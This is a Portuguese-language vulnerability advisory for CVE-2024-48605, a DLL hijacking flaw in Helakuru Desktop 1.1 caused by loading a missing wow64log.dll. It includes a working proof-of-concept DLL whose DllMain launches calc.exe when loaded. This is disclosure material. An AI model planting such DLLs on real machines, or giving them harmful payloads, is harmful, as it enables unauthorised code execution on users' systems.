
Helakuru Versão 1.1 DLL Hijack - CVE-2024-48605
Resumo
O Helakuru Desktop versão 1.1v opera em arquiteturas de 64 bits e 32 bits. Durante os testes, foi identificado que o programa tenta carregar a wow64log.dll, que não é incluída por padrão nos sistemas operacionais Windows modernos. Isso resulta em um erro 'Name not found', expondo o programa a uma vulnerabilidade de DLL Hijacking. Ao criar uma wow64log.dll maliciosa, é possível obter execução arbitrária de código.
Versão Afetada
Helakuru Desktop 1.1v
Passos para Reproduzir

#include <windows.h>
#include <stdio.h>
void LaunchCalculator()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
const char* calcCmd = "C:\\Windows\\System32\\calc.exe";
if (!CreateProcessA(
NULL,
(LPSTR)calcCmd,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi))
{
printf("CreateProcess failed (%d).\n", GetLastError());
}
else
{
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
LaunchCalculator();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}


Impacto: Esta vulnerabilidade permite a execução arbitrária de código.